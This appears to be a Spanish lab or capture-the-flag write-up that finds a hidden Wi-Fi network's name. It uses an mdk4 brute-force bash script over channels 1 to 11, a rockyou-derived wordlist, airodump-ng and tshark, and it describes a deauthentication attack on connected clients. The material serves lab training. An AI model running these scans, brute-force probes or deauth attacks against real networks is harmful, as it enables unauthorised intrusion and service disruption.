04. What is the ESSID of the hidden AP (mac F0:9F:C2:6A:88:26)?
50 puntos
Activar modo monitor sobre interfaz detectada
sudo airmon-ng start <wlan_interface>
Crear diccionario con fichero /root/rockyou-top100000.txt adaptado para el nombre de los ESSID genéricos dispuestos en el laboratorio (con prefijo wifi-)
cat /root/rockyou-top100000.txt | awk '{print "wifi-" $1}' > wifi.txt
Crear script en bash de nombre essid-discovery.sh para aplicar fuerza bruta con los nombre de essid dispuestos en fichero wifi.txt, sobre los 11 canales del rango de 2.4 GHz a través de mdk4
#!/bin/bash
read -p "Enter your network interface in monitor mode: " wifi_int
bssid="F0:9F:C2:6A:88:26"
wordlist="/root/wifi.txt"
for channel in {1..11}; do
echo -e "\nScanning channel $channel...\n"
iwconfig $wifi_int channel $channel
mdk4 $wifi_int p -t $bssid -f $wordlist
echo -e "Channel $channel finished...\n"
done
echo "Bye..."
Asignar permisos de ejecución al script creado y ejecutar redirigendo la salida a un fichero de nombre output.txt
chmod +x essid-discovery.sh
./essid-discovery.sh
o ejecutar directamente con bash
bash essid-discovery.sh
Revisar el output de la ejecución anterior y analizar el mensaje "Probe Response from target AP with SSID..."

Otra opción es que al ejecutar el script, redirigir el output a un fichero para filtrar posteriormente por la cadena "Probe Response from target AP with SSID", la cual es parte de la respuesta emitida por mdk4 cuando logra obtener respuesta de un dispositivo asociado a un BSSID consultado
./essid-discovery.sh > output.txt
cat output.txt | grep -i "probe response from target ap with ssid..."

Otra forma de abarcar este ejercicio
Otra forma de obtener el ESSID del AP es capturar tráfico con Airodump-ng sobre el BSSID entregado
Activar modo monitor sobre interfaz detectada
sudo airmon-ng start <wlan_interface>
Realizar escaneo de redes sobre el BSSID entregado y generar fichero de salida
sudo airodump-ng --write output-04 --bssid F0:9F:C2:6A:88:26 <wlan_interface>
Analizar fichero de salida con tshark, del cual solo se obtendrá un paquete Beacon capturado
tshark -r output-04.cap

Debido a que el tráfico solo posee un paquete Beacon, es imposible conocer el ESSID, ya que en este paquete no se tramita esta información, pero si podemos obtener el BSSID desde el paquete
tshark -r output.cap -Y "wlan.fc.type_subtype==8" -T fields -e wlan.bssid

Para obtener el ESSID debiésemos generar un ataque de desautenticación sobre algún dispositivo que tenga conectado el AP (para este ejercicio el AP no posee ningún dispositivo conectado), para que se generase el envío de paquetes Probe Request y Probe Response entre ambos, ya que en el paquete Probe Request se tramita el ESSID del AP. El comando de filtro sería el mismo, pero cambiaría el tipo de paquete y el campo de análisis
tshark -r output.cap -Y "wlan.fc.type_subtype==4" -T fields -e wlan.ssid
RESUELTO
